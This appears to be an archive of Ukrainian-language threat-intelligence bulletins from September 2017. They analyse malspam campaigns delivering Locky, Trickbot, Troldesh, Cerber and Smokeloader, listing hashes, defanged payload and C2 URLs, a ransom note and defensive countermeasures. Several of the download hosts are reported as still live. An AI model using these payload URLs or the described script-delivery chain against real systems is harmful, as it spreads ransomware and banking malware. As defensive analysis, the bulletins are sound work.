Archive | September 2017

IOC_vbs_asorti_280917

Доброго дня, панове.

Вчора ввечері було зафіксовано спроби доставки Locky Ransomware та Trickbot.

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через VBS скрипти у оболонці 7z.

Трохи аналітики:

  • напередодні (27го) проходила схожа розсилка але з одним payload
  • обидва зразки скриптів містять 6 посилань на три різних payload (два Locky та trickbot)
  • адреси на  завантаження payload не обфусковані, проте додана перевірка коду країни
  • в залежності від приналежності public IP використовується одна з двох гілок URL
  • слід остерігатися появи схожих скриптів із обфускацією та завантаженням payload по HTTPS
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload детектуються по GTI.

Схема атаки:

email > Attach (7z) > VBS > Country by IP > choose URL > GET > %temp%\random.exe

Маркери IOC:

File Name Scan0547.vbs
SHA-256 Hash Identifier 0BBB9E991DD845D60B25CD66DE7AEB4FD9AFD3548B3CD3ABC637F8D34057FDB3
File Size 12310 bytes
File Type ASCII text

перевірка зовнішньої адреси:

Array("https://ipinfo.io/json","http://www.geoplugin.net/json.gp","http://freegeoip.net/json/")

дві гілки завантажень

mual = Array("-ambrogiauto.com/9hciunery8g?","+sherylbro.net/p66/LUYTbjnrf","+(tb)patrickreeves.com/9hciunery8g?") 
mual = Array("+modaintensa.com/LUYTbjnrf?","+poemsan.info/p66/d8743fgh","+mediatrendsistem.com/LUYTbjnrf?")

File Name Scan0197.vbs
SHA-256 Hash Identifier BD4636951EC2258594666B46A76C29410BE8A9EA71AB7A764C2DC43B1ABA3157
File Size 12183 bytes
File Type ASCII text

перевірка зовнішньої адреси:

Array("https://ipinfo.io/json","http://www.geoplugin.net/json.gp","http://freegeoip.net/json/")

дві гілки завантажень

mual = Array("feng-lian.com.tw/9hciunery8g?","sherylbro.net/p66/LUYTbjnrf","-jaysonmorrison.com/9hciunery8g?") 
mual = Array("-plumanns.com/LUYTbjnrf?","poemsan.info/p66/d8743fgh","atlantarecyclingcenters.com/LUYTbjnrf?")

по типам payload:

/LUYTbjnrf – Locky варіант 1й

/d8743fgh – Locky варіант 2й

/9hciunery8g – trickbot

File Name LUYTbjnrf_LOCKY_RANSOM_1
SHA-256 Hash Identifier 4A4491A5DAA0B8C0D4E694601CBB860E0E069356B83E2F6EA215BE758F533F1E
File Size 589824 bytes
File Name d8743fgh_LOCKY_RANSOM_2
SHA-256 Hash Identifier 3E55A7A405E4C4E4AD6D19296AC512D6C32441D5A65419CD116FAA672B11963C
File Size 604672 bytes
File Name 9hciunery8g_TRICKBOT
SHA-256 Hash Identifier 01E771DC6CF9572EAC3D87120D7A7D1FF95FDC1499B668C7FDE2919E0F685256
File Size 423424 bytes

По зразкам Locky – поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

По trickbot – після запуску дублює своє тіло у

C:\Users\operator\AppData\Roaming\winapp\9idjunfry8h_USICKBPU.exe

Закріплюється через задачу системного планувальника

\services update c:\users\operator\appdata\roaming\winapp\9idjunfry8h_usickbpu.exe 27.09.2017 23:52

запускає новий екземпляр svchsot та інжектує себе у нього

C:\Windows\system32\svchost.exe > svchost.exe -k netsvcs

від його імені проводить мережеві комунікації:

78.47.139.102:80       HTTP myexternalip.com GET /raw HTTP/1.1

– визначення Public IP

185.158.115.72:443       TCP 185.158.115.72 [TCP Retransmission] 49346 → 443 [SYN]
194.87.92.30:443       TCP 194.87.92.30 [TCP Retransmission] 49351 → 443 [SYN]

– комунікації із серверами контролю

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

завантаження основної частини (payload)

Scan0547

192.99.35.71:80 HTTP 365 modaintensa.com GET /LUYTbjnrf? HTTP/1.1  
89.96.90.17:80 HTTP 360 ambrogiauto.com GET /9hciunery8g? HTTP/1.1 вже не доступний
37.229.33.147:80 HTTP 359 sherylbro.net GET /p66/LUYTbjnrf HTTP/1.1
208.79.200.8:80 HTTP 362 patrickreeves.com GET /9hciunery8g? HTTP/1.1
46.118.33.19:80 HTTP 357 poemsan.info GET /p66/d8743fgh HTTP/1.1
178.212.207.6:80 HTTP 363 mediatrendsistem.com GET /LUYTbjnrf? HTTP/1.1

Scan0197

203.74.202.50:80 HTTP 361 feng-lian.com.tw GET /9hciunery8g? HTTP/1.1
37.229.33.147:80 HTTP 359 sherylbro.net GET /p66/LUYTbjnrf HTTP/1.1
208.79.200.165:80 HTTP 363 jaysonmorrison.com GET /9hciunery8g? HTTP/1.1
65.44.220.61:80 HTTP 360 wrcchq.org GET /Bank/Scans385.zip HTTP/1.1 вже не доступний
217.160.224.147:80 HTTP 355 plumanns.com GET /LUYTbjnrf? HTTP/1.1
92.112.29.147:80 HTTP 357 poemsan.info GET /p66/d8743fgh HTTP/1.1
98.124.251.75:80 HTTP 370 atlantarecyclingcenters.com GET /LUYTbjnrf? HTTP/1.1

трафік після активації trickbot

78.47.139.102:80       HTTP myexternalip.com GET /raw HTTP/1.1

– визначення Public IP

185.158.115.72:443       TCP 185.158.115.72 [TCP Retransmission] 49346 → 443 [SYN]
194.87.92.30:443       TCP 194.87.92.30 [TCP Retransmission] 49351 → 443 [SYN]

– комунікації із серверами контролю

#

додаток1 – маркери по розсилці Locky (27/09/17)

(скрипти без перевірки країни, містять 3 URL)

209.140.18.67 80 HTTP bosphorustekneleri.com GET /d8743fgh? HTTP/1.1 
77.120.149.27 80 HTTP poemsan.info GET /p66/d8743fgh HTTP/1.1
138.201.161.139 80 HTTP dic-astra.com GET /d8743fgh? HTTP/1.1

додаток2 – маркери по розсилці Locky (26/09/17)

(скрипти без перевірки країни, містять 3 URL)

80.172.241.44 h11p://bsfotodesign.com 80.172.241.44 GET /dg6rerg? h11p/1.1 
72.249.104.96 h11p://brascopperchile.cl 72.249.104.96 GET /dg6rerg? h11p/1.1
46.175.103.224 h11p://playbrief.info 46.175.103.224 GET /p66/dg6rerg h11p/1.1
84.38.226.161 h11p://bouwpartnerzaagenschaaf.nl 84.38.226.161 GET /dg6rerg? h11p/1.1
149.210.143.182 h11p://gbvm.nl 149.210.143.182 GET /jkhguygv73? h11p/1.1
46.175.103.224 h11p://playbrief.info 46.175.103.224 GET /p66/jkhguygv73 h11p/1.1
216.55.186.90 h11p://fiancevisacover.com 216.55.186.90 GET /jkhguygv73? h11p/1.1

додаток3 – маркери по розсилці banker (26/09/17)

(обфускований js, один URL, завантаження payload по HTTPS)

h11ps://ZELGORODPP.RU/FOTO/PAGEANT.EXE
h11p://THEBALANCE.BID  - 185.82.202.116 (2C)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

IOC_Locky_220917

Візьміть також до уваги мережеві маркери по сьогоднішній розсилці
dropperr – VBS файли
payload – EXE (Locky Ransomware) – уже розбирав раніше

Мережеві IOC:

!посилання досі активні!
(отримано з VBS скрипта який був переданий на аналіз)
98.124.251.69 HTTP 362 anderlaw.com GET /jhdsgvc74? HTTP/1.1 
95.67.75.154 HTTP 360 ideathlike.net GET /p66/jhdsgvc74 HTTP/1.1
85.17.24.201 HTTP 356 arktupala.com GET /jhdsgvc74? HTTP/1.1
Додаткові адреси пов’язані із даною кампанією:
h11p://animal-naturals.net/jhdsgvc74
h11p://antwerpiastamps.be/jhdsgvc74
h11p://amesatarragona.com/jhdsgvc74
h11p://amatuermatch.org/jhdsgvc74
h11p://allesandradesigns.com/jhdsgvc74

Схема атаки:

email > attach (7z) > VBS >  WScript > URL > GET > %temp%\%random%.exe

Маркери IOC:

File Name Invoice_file_70855.vbs
SHA-256 Hash Identifier 5C8ED74A3E1AAC74E48F84B2DE6B3DF3068DAAA3FEFB3F5D4D65A052E9D95007
File Size 10934 bytes
File Type ASCII text

срипт містить три адреси які перебирає з метою завантаження основної частини

298.124.251.69 HTTP 362 anderlaw.com GET /jhdsgvc74? HTTP/1.1 
95.67.75.154  HTTP 360 ideathlike.net GET /p66/jhdsgvc74 HTTP/1.1
85.17.24.201 HTTP 356 arktupala.com GET /jhdsgvc74? HTTP/1.1

у випадку доступності одного із трьох джерел – іде завантаження основної частини у %temp%\random.exe

File Name yWNeyvWNFWo.exe
MD5 Hash Identifier 693EF59145AA6B9E329F91538855EF64
SHA-1 Hash Identifier E3067D7C7227AF026C0ABFBDF7B417C4E294F380
SHA-256 Hash Identifier 3A810CBAD7296F83122C4A16B935A723D8019419069A55C939D93C246ABED2AC
File Size 670208 bytes

На тестовій системі шифрування не відбулося, засобів закріплення виявлено не було, зразок видалив себе.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_troldesh_ransom_220917

Доброго вечора, панове.

Сьогодні було зафіксовано спробу доставки різновиду Troldesh Ransomware.

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Трохи аналітики:

  • Зловмисники комбінують зразок який я уже розбирав із методом доставки через OLE
  • Файл-приманка не містить макросів, натомість там обфускований JS у вигляді OLE об’єкту
  • По при примітивний підхід сама приманка (dropper) мала низький рейтинг на VT (6/59)
  • Обидві частини dropper та payload розповсюджуються із двох різних скомпрометованих сайтів зони AU
  • Зразок закріплюється в системі і шифрування починає із затримкою 10-15 хв
  • Основна частина (payload) замаскована під png файл
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload детектуються по GTI.

Схема атаки:

email > URL > DOCX > OLE > JS > WScript > URL > GET > %APPDATA%\Microsoft\Windows\Templates\random.exe

Маркери IOC:

Сам документ приманка розповсюджується із скомпрометованого серверу (досі активний!):

142.4.12.133  h11p://http://www.bajaparts.com.au/kvit_recepr_92217.docx

File Name kvit_recepr_92217.docx
SHA-256 Hash Identifier 35CE8815C0D78DDD58C651FC520D65343CF919388944683F693BA994AD7C57D9
File Size 47017 bytes
File Type application/vnd.openxmlformats-officedocument.wordprocessingml.document

При відкритті користувачу пропонують активувати два OLE об’єкти (два JS скрипти)

Якщо користувач запускає подвійним кліком один із них, він записується та оброблюється WSCript із %temp%

File Name Квитанция.js
SHA-256 Hash Identifier A6201F69711961EF02FBC1A584A65FCF7FFA431E57F4F9F8653F005F3F2961CF
File Size 50304 bytes

Його активація призводить до завантаження основної частини із скомпрометованого серверу (досі активний!):

27.121.64.61 h11p://www.papermillmedia.com.au GET /wp-includes/customize/copy_example_.png HTTP/1.1

у випадку успішного завантаження основне тіло записується процесом WSCript у каталог “%APPDATA%\Microsoft\Windows\Templates\939299.exe”

File Name copy_example.png            >>  939299.exe
SHA-256 Hash Identifier 1DCF33CE009B879CE5D5197904151DC32112476F84E50F808BF55E8C9EA2130D
File Size 1028608 bytes

Після запуску дублює своє тіло у C:\ProgramData\Windows\csrss.exe

Закріплюється через HKEY_USERS\SID\Software\Microsoft\Windows\CurrentVersion\Run\

Через 10-15 хв після активації розпочинає процес шифрування файлів, зашифровані файли отримують розширення .crypted000007

Цитата із вимог про викуп:

“Baши фaйлы были зашифрoваны.

Чтобы pасшифрoваmь uх, Вaм нeoбxодимо omправumь кoд:

85F93484188BBACD2983|839|6|8

нa элеkmрoнный адpec VladimirScherbinin1991@gmail.com”

Мережева активність скомпрометованої системи:

939299.exe 2192 TCP 127.0.0.1 49283 ESTABLISHED
939299.exe 2192 TCP 127.0.0.1 49282 ESTABLISHED
939299.exe 2192 TCP 194.109.206.212 443 ESTABLISHED
939299.exe 2192 TCP 131.188.40.189 443 ESTABLISHED
939299.exe 2192 TCP 94.31.53.203 443 ESTABLISHED
939299.exe 2192 TCP 89.233.27.241 443 ESTABLISHED
939299.exe 2192 TCP 89.223.27.241 443 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження документу з OLE можна було перервати через блокування OLE на шлюзах WEB та EMAIL
  2. Активацію OLE можна було заблокувати через параметри реєстру
  3. Запис JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  4. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  5. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

завантаження файлу-приманки (dropper)

142.4.12.133  h11p://www.bajaparts.com.au/kvit_recepr_92217.docx

завантаження основної частини (payload)

27.121.64.61  h11p://www.papermillmedia.com.au GET /wp-includes/customize/copy_example_.png HTTP/1.1'

трафік після запуску payload

194.109.206.212 443 ESTABLISHED
131.188.40.189 443 ESTABLISHED
94.31.53.203 443 ESTABLISHED
89.233.27.241 443 ESTABLISHED
89.223.27.241 443 ESTABLISHED

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блок запуску OLE об’єктів через параметри пакету MS Office (HKCU\Software\Microsoft\Office\<Office Version>\<Office application>\Security\PackagerPrompt)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_18Cerber-19Smokeloader

Доброго дня, панове.

Візьміть до уваги дані по двом розсилкам.

18го числа проходила розсилка VBS скриптів, які ініціювали завантаження та запуск Cerber Ransomware

19го числа (сьогодні зранку) проходила розсилка JS скриптів, які ініціювали завантаження та запуск Smokeloader

Рівень загрози по cerber – середній, по smokeloader – високий.

Для організацій, що прислухалися до моїх попередніх рекомендацій щодо обмежень операцій із скриптовими файлами – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload обох розсилок детектуються DAT & GTI.

Трохи аналітики:

  • Частина джерел досі активні (детальніше дивіться в блоці маркерів)
  • По сьогоднішній розсилці є скомпрометовані веб-ресурси українських організацій (ТОВ «РАДІОЛОГІЧНИЙ ЦЕНТР «СТАКС», Компания «VKmodule»)
  • Кампанія по cerber (18те) проходила через нелокалізовані листи
  • Кампанія по smokeloader проходила з локалізованими листами із зображеннями документів (паспорту)
  • Крім двох VBS, кожен із скриптів містить як мінімум два посилання (не одне)
  • Для обходу фільтрів застосовують обгортку у вигляді 7zip (не всі рішення підтримують сканування архівів цього формату)
  • У другому випадку застосували запуск із Робочого столу щоб обійти можливі політики щодо %temp%
  • Payload в обох випадках передається у відкритому вигляді (не кодований)

Схема атаки:

18/09 – VBS _ Cerber

email > attach (7z) > VBS >  WScript > URL > GET > %temp%\%random%.exe

19/09 – JS _ Smokeloader

email > attach (7z) > JS > WScript > URL > GET > %Userprofile%\Desktop\%random%.exe

 

Маркери IOC:

 

18/09 – VBS – Cerber

File Name 20488960477.vbs 
SHA-256 Hash Identifier E67C1156F7049F0C9C480109CEA8F5FC27527E3E10D874B2A94D228A13B56C30
File Size 9720 bytes
File Type ASCII text

намагається завантажити payload із

98.124.251.167 80 HTTP troyriser.com GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1
File Name 9752714232.vbs
SHA-256 Hash Identifier E95808AA32993A842A9C8245FA23D760B72B651688510048112D97B3682AB2F1
File Size 9881 bytes
File Type ASCII text

намагається завантажити payload із

98.124.251.167 80 HTTP troyriser.com GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1
File Name 32359538621.vbs

SHA-256 Hash Identifier E89F385EC88198DC7ABB9B6C57F64EC473469F0CD4D2B174A9996894561075E1

File Size 9740 bytes

File Type ASCII text

намагається завантажити payload із

149.56.223.252 80 HTTP saitis.eu GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1

File Name 2705466177.vbs
SHA-256 Hash Identifier 04F34C472657E1E5434DC119A54858490A7392BAD3F53699488E5C5F36F9D030
File Size 10020 bytes
File Type ASCII text

намагається завантажити payload із

85.95.237.29 80 HTTP yildizmakina74.com GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1

File Name I_202505~1.vbs
SHA-256 Hash Identifier 5E364BA40816233DD82ABC039292F6B91696B04EDD8570F0CC04AF9322454E8C
File Size 11288 bytes
File Type ASCII text

намагається завантажити payload із

207.58.143.135 80 HTTP gabriellesrestaurant.com GET /GHFbfsalku65? HTTP/1.1
 

File Name I_442393~1.vbs
SHA-256 Hash Identifier 4061030F24622876509F3324CD0D2EEAF2F52FA86E880C905195ED4449F93109
File Size 11373 bytes
File Type ASCII text

намагається завантажити payload із

185.18.198.158 80 HTTP camerawind.com GET /GHFbfsalku65? HTTP/1.1

у випадку успішного завантаження в %temp% записується файл

File Name AciFyqRD.exe
SHA-256 Hash Identifier 3EBB3C50EA81E6897F130CD5582981CA6EE0A5432EBFE85FA522DC25FC462AAF
File Size 649216 bytes

– на тестових системах зразок шифрування не розпочав і після запуску дав команду на видалення себе через cmd

– – – –

19/09 – JS – Smokeloader




File Name труд_договор.js
SHA-256 Hash Identifier DDADB1A64C2A642DC481AFD65203240F225D67BE90ECFB15048F045B6C24FC84
File Size 21770 bytes
File Type ASCII text

активація скрипта приманки призводить до завантаження основного тіла із (додаткові адреси див. в блоці мережевих маркерів)

194.28.87.175 HTTP staks.com.ua GET /image/svhost.exe HTTP/1.1


File Name SVHOST.EXE
SHA-256 Hash Identifier 97B587AEF1FB6E51EFE1428CD6936430962C31590A7C01A8B9CF45B04C923734
File Size 268288 bytes

Яке записується та стартує із каталогу %Userprofile%\Desktop\random.exe

– дуже агресивний, після запуску припиняє роботу утиліт моніторингу

– інжектує себе у процес explorer.exe

– додає у автозавантаження через HCU\Run

– ініціює з’єднання із сервером контролю 47.89.252.198 HTTP poperediylimitkv.com POST /web/ HTTP/1.1

– блокує запуск утиліт моніторингу під обліковим записом жертви

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

18/09 – VBS – Cerber

завантаження основної частини (payload)

98.124.251.167 HTTP troyriser.com GET /87thiuh3gfDGS? HTTP/1.1 (видалено)
46.185.113.174 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1 (файл досі присутній)
149.56.223.252 HTTP saitis.eu GET /87thiuh3gfDGS? HTTP/1.1 (видалено)
85.95.237.29 HTTP yildizmakina74.com GET /87thiuh3gfDGS? HTTP/1.1 (видалено)

одиночні скрипти

207.58.143.135 HTTP gabriellesrestaurant.com GET /GHFbfsalku65? HTTP/1.1 (видалено)
185.18.198.158 HTTP camerawind.com GET /GHFbfsalku65? HTTP/1.1 (видалено)

19/09 – JS – Smokeloader

завантаження основної частини (payload)

194.28.87.175 HTTP staks.com.ua GET /image/svhost.exe HTTP/1.1 (файл досі присутній)
212.26.135.68 HTTP vkmodule.com.ua GET /ppt/svhost.exe HTTP/1.1 (файл досі присутній)
47.89.252.198 HTTP poperediylimitkv.com GET /hiloddfvnc/svc.exe HTTP/1.1 (файл досі присутній)

комунікація із контрольним центром (С2)

47.89.252.198 HTTP poperediylimitkv.com POST /web/ HTTP/1.1  (активний обмін даними зі скомпрометованої системи)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_ransom_110917

Доброго дня, панове.

Візьміть, будь ласка, до уваги.

Вчора в другій половині дня було зафіксовано спробу доставки загрози типу Locky Ransomware.

Рівень загрози – середній.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload детектуються GTI.

Трохи аналітики:

  • Станом на 14ту годину джерела досі активні, контрольні суми dropper та payload змінились вже втретє
  • Скрипт містить 3 адреси для завантаження одного й того ж payload
  • Знову задіяли механізм перенаправлення.
  • Пара URL – в листах іде перший, dropper (доставка типу Nemucod) на другому
  • Пару URL досі не закрили – будуть використовувати надалі, варто блокувати 188.121.39.106 _ h11p://asma.org.uk та  47.88.55.29 _ h11p://wittinhohemmo.net
  • План зловмисників простий – JS по каналу email уже блокують, а от на proxy без обгортки архівом ще поки не всі
  • Початкова стадія інфікування не виходить за межі зразків, які розглядалися раніше
  • Після запуску основної частини на моїх тестових системах шифрування не відбулося
  • Основне тіло (payload) збирає список запущених процесів і надсилає їх на зовнішній ресурс

Схема атаки:

email > URL1 > redirect > URL2 > User\Downloads\*.JS > URL3(4)(5) > %AppData%\random.exe

Лист виду:

Hi %username%,

We just need to verify your email address before your sign up is complete!

Verify your email  (URL > h11p://asma.org.uk/dropbox.html)
Happy Dropboxing!

Зверніть увагу на адресний рядок та поле From на діалозі завантаження

Іронія долі полягає у тому, що при завантаженні приманки через бравзер ОС намагається попередити користувача…

Маркери IOC:

При переході за посиланням іде перенаправлення на інший сайт з якого іде спроба завантаження JS приманки.

11/09

File Name Dropbox-MSGCODE-74089.js
SHA-256 Hash Identifier 998165D0349D4229B5737ECE7359C90ED332DA7AF995DA7B585D08277EECBF9C
File Size 16069 bytes

запуск приманки призводив до завантаження основного тіла за посиланням h11p://alu-bel.com GET /qxkugly.exe

Payload завантажується у відкритому вигляді, сам код не обфускований

File Name 1723.exe
SHA-256 Hash Identifier 819F63FD207029FA618BAC02A10AA73EE0CA15DF9EB6135F88E6F7C4BB822B29
File Size 675840 bytes

основне тіло записується і запускається %AppData%\random.exe

після запуску основного тіла іде перевірка системи на відповідність умовам і збір переліку запущених процесів, який потім передається на ресурс

h11p://dintsparrednotsit.info POST /eroorrrs

Відправка інформації про список запущених процесів – а оптім вони дивуються звідки зловмисники знають про те, який захист використовують …

12/09

сьогодні файл за посиланням було змінено на інший (обфускація та сама, посилання на збір даних у відкритому вигляді, контрольна сума інакша)

File Name Dropbox-MSGCODE-6941.js
SHA-256 Hash Identifier 3F5C0E0646813B2EA200C9834CCAE51057A4E29A29DA9C3660F6FE72E238D03F
File Size 17415 bytes
File Type ASCII text

запуск приманки призвів до циклу з трьох завантажень (у скрипті “зашиті” 3 посилання які містять одну й ту саму начинку)

_ h11p://mh-service.ru GET /canbtcc.exe

_ h11p://alexkreeger.com GET /golgers.exe

_ h11p://mobius-group.com GET /ueunyli.exe

Чітко видно цикл із трьох запусків та переходів

у всіх випадках завантажувався один і той самий файл, його поведінка була ідентична

File Name canbtcc[1].exe
SHA-256 Hash Identifier 5BF84469051C85BD684E03EB46F774CB1E913884C95ACF7B210A8A4469DA8D9F
File Size 675840 bytes

основне тіло записується і запускається %AppData%\random.exe

після запуску основного тіла іде перевірка системи на відповідність умовам і збір переліку запущених процесів, який потім передається на ресурс

h11p://dintsparrednotsit.info POST /eroorrrs

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис JS приманки на диск (розпаковку) можна було попередити заборонивши створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення .tmp та .exe файлів у каталозі профілю та %tmp% якщо не стандартний шлях (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5-6 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

11/09

188.121.39.106 _ h11p://asma.org.uk GET /dropbox.html
47.88.55.29 _ h11p://wittinhohemmo.net GET /drop.php
212.63.108.71  _ h11p://alu-bel.com GET /qxkugly.exe
47.88.55.29  _ h11p://dintsparrednotsit.info POST /eroorrrs

12/09

188.121.39.106 _ h11p://asma.org.uk GET /dropbox.html 
47.88.55.29 _ h11p://wittinhohemmo.net GET /drop.php
89.253.235.118 _ h11p://mh-service.ru GET /canbtcc.exe 
47.88.55.29 _ h11p://dintsparrednotsit.info POST /eroorrrs
66.199.174.108 _ h11p://alexkreeger.com GET /golgers.exe
47.88.55.29 _ h11p://dintsparrednotsit.info POST /eroorrrs
176.56.62.143 _ h11p://mobius-group.com GET /ueunyli.exe
47.88.55.29 _ h11p://dintsparrednotsit.info POST /eroorrrs

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JS файлів на рівні каналів передачі Web та Email
  • Заборона створення та зчитування/запуску *.JS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Ransom_troldesh_050917

Доброго дня, панове.

За даними @malwrhunterteam Вчора було зафіксовано спробу доставки Ransomware типу TorrentLocker (shade/troldesh,).

ransomnote_filename: READMExx.txt

ransomnote_email: VladimirScherbinin1991[@]gmail.com

ransomnote_url: h11p://cryptsen7fo43rr6.onion.cab/

encrypted files are <base64>.<ID>.crypted000007

Доставка через JS скрипт (Nemucod) і завантаження основного тіла через WScript.

Доставку забезпечує скомпрометований сайт h11p://contrast.com.ua (194.24.182.138)

Сайт містить обидві частини – dropper та payload:

Важливо – станом на 12:30 файли досі доступні, судячи з дати модифікації були опубліковані ще 5/09/17.

Рівень загрози – середній.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

